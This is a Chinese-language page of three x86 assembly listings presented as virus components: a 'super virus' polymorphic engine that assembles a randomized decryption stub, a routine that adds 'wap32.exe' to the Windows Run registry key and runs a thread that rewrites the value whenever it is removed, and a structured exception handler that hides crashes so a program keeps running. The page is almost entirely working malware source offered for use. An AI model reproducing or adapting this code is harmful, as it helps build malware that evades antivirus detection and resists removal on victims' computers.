超级病毒变形引擎

 

此段代码会在DATA段内生成一个解密代码。

.586p
.model flat,STDCALL
extrn ExitProcess: proc
VirusSize=100h
.data

DecodeMethod dd ?
DeCode:
pushad
call Encode
db 100h dup(11h)
Encode:
db 100h dup(0cch)
RndReg0 dd 0 ;eax
RndReg1 dd 0 ;ebx
RndCode dd 0 ;Rnd Code
RndMima dd 60932561 ;Rnd Password

.code
@@Start:
mov eax,RndMima
ror eax,7
mov RndCode,eax

mov eax,RndCode
mov ecx,eax
and eax,011b
mov RndReg0,eax
xor ecx,RndMima
and ecx,011b
cmp eax,ecx
jnz short ChooseRegOk
inc ecx
and ecx,011b
ChooseRegOk:
mov RndReg1,ecx

mov edi,offset Encode

ror RndCode,1
call GetBxCode,0,RndReg0,RndCode
mov esi,eax
ContFillStep0:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep0
dec edi

ror RndCode,1
call GetBxCode,1,RndReg1,RndCode
mov esi,eax
ContFillStep1:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep1
dec edi

mov ebx,edi ;//计算机Jmp指令用

ror RndCode,1
call GetBxCode,2,RndReg0,RndCode
mov esi,eax
ContFillStep2:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep2
dec edi

mov eax,RndMima
mov [edi-4],eax ;//填写随机密码
mov eax,RndCode
and eax,01
mov DecodeMethod,eax ;//填写DeCode方法

ror RndCode,1
call GetBxCode,3,RndReg0,RndCode
mov esi,eax
ContFillStep3:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep3
dec edi

ror RndCode,1
call GetBxCode,4,RndReg1,RndCode
mov esi,eax
ContFillStep4:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep4
dec edi

ror RndCode,1
call GetBxCode,5,RndReg0,RndCode
mov esi,eax
ContFillStep5:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep5
dec edi

mov al,0c3h
mov [edi],al ;//填写Ret指令

sub ebx,edi
mov [edi-1],bl ;//填写jmp指令

int 3;

jmp DeCode
ret
GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
call GetBxCodeAddr
Step0_Eax:
mov eax,[esp]
int 3;
pop eax
push eax
int 3;
Step0_Ebx:
pop ebx
push ebx
int 3;
push dword ptr[esp]
pop ebx
int 3;
Step0_Ecx:
mov ecx,[esp]
int 3;
pop ecx
push ecx
int 3;
Step0_Edx:
mov edx,[esp]
int 3;
mov edx,esp
mov edx,[edx]
int 3

Step1_Eax:
mov eax,VirusSize
int 3
sub eax,eax
add ax,VirusSize+3081h
sub ax,3081h
int 3
Step1_Ebx:
mov ebx,VirusSize
int 3;
xor ebx,ebx
or bx,VirusSize
int 3;
Step1_Ecx:
sub ecx,ecx
xor ecx,(VirusSize xor 3181h)
xor ecx,(3181h)
int 3;
mov ecx,0
and cx,VirusSize
int 3
Step1_Edx:
and edx,0
xor dx,(VirusSize-0281h)
add dx,0281h
int 3;
xor edx,edx
sub edx,(0181h-VirusSize)
sub edx,-0181h
int 3;

Setp2_Eax:
xor [eax],12345678h
int 3
add [eax],12345678h
int 3
Setp2_Ebx:
xor [ebx],12345678h
int 3;
add [ebx],12345678h
int 3;

Setp2_Ecx:
xor [ecx],12345678h
int 3;
add [ecx],12345678h
int 3;
Setp2_Edx:
xor [edx],12345678h
int 3;
add [edx],12345678h
int 3;
Step3_Eax:
add eax,4
int 3
inc eax
inc eax
inc eax
inc eax
int 3;
Step3_Ebx:
add ebx,5
dec ebx
int 3
add ebx,2
add ebx,2
int 3;
Step3_Ecx:
sub ecx,-4
int 3
sub ecx,-5
dec ecx
int 3;
Step3_Edx:
inc edx
sub edx,-3
int 3
add edx,04
int 3;

Step4_Eax:
sub eax,4
int 3
dec eax
dec eax
dec eax
sub eax,1
int 3;
Step4_Ebx:
dec ebx
sub ebx,3
int 3;
dec ebx
dec ebx
sub ebx,2
int 3;
Step4_Ecx:
add cx,123
sub cx,123+4
int 3
sub cx,-4
dec cx
sub cx,7
int 3
Step4_Edx:
sub dx,2
dec dx
sub dx,1
int 3
inc edx
sub dx,5
int 3;
Step5_Eax:
jnz $
int 3
ja $
int 3
Step5_Ebx:
jg $
int 3
jnb $
int 3
Step5_Ecx:
jnl $
int 3
jnz $
int 3
Step5_Edx:
ja $
int 3
jg $
int 3

GetBxCodeAddr:
pop esi
mov al,0cch ;//指令分割符
mov ecx,Step
shl ecx,1
shl ecx,1
add ecx,Reg ;//计算机得到的指令位置
shl ecx,1
and Rnd,01b
add ecx,Rnd
jcxz short GetBxCodeOver
ContFindCode:
push ecx
ContFindCC:
inc esi
cmp [esi],al
jnz ContFindCC
pop ecx
loop ContFindCode
mov eax,esi
inc eax
ret
GetBxCodeOver:
mov eax,esi
ret
GetBxCode endp

end @@Start

2、Windows 9x/2000/xp 琐定注册表

.586p
.model flat,STDCALL
.data

HKeyStr db 'SOFTWARE/Microsoft/Windows/CurrentVersion/Run',0
ValueName db 'wap32',0
PathName db 'wap32.exe',0

.code

extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn ExitProcess: proc
extrn RegNotifyChangeKeyValue: proc
extrn CreateThread: proc
extrn Sleep: proc
extrn RegQueryValueExA: proc

start:
push eax
call RegOpenKeyA,080000002h,offset HKeyStr,esp
pop ebx
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

sub esp,100h
mov eax,esp
push 100h
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
pop eax
add esp,100h

push eax
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
pop eax
call Sleep,1000*60*3
ret

RegProtectProc proc hKey:dword
mov ebx,hKey
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'wap32',0
GetProtectKeyName:
pop esi
push 100h
call RegQueryValueExA,ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call RegNotifyChangeKeyValue,ebx,0,4,0,0
call RegSetValueExA,ebx,esi,0,01,edi,100h
jmp short WaitRegChangeNotify
RegProtectProc endp

end start

3、 Windows 9x/2000 意外处理通用程序

此段程序可以达到屏蔽程序错误的效果

include wap32.inc

.386p
.model flat,stdcall

extrn MessageBoxA: proc
extrn ExitProcess: proc

.data

Msg db 'Fuck',0

SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetEspAddr
push D [edx] ;保存原Esp地址值
mov [edx],esp
jmp eax
ClearSehFrame:
pop eax ;弹出返回地址
call GetEspAddr
mov esp,[edx]
pop D [edx] ;恢复原Esp地址值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax

Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame
jmp ecx
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp

GetEspAddr:
call PushOffsetEspAddr
dd ?
PushOffsetEspAddr:
pop edx
ret

.code

Start:
call PushErrorProc
call MessageBoxA,0,offset Msg,offset Msg,0
ret
PushErrorProc:
pop ecx
call SetSehFrame
mov ds:[0],eax
call ClearSehFrame
ret

end Start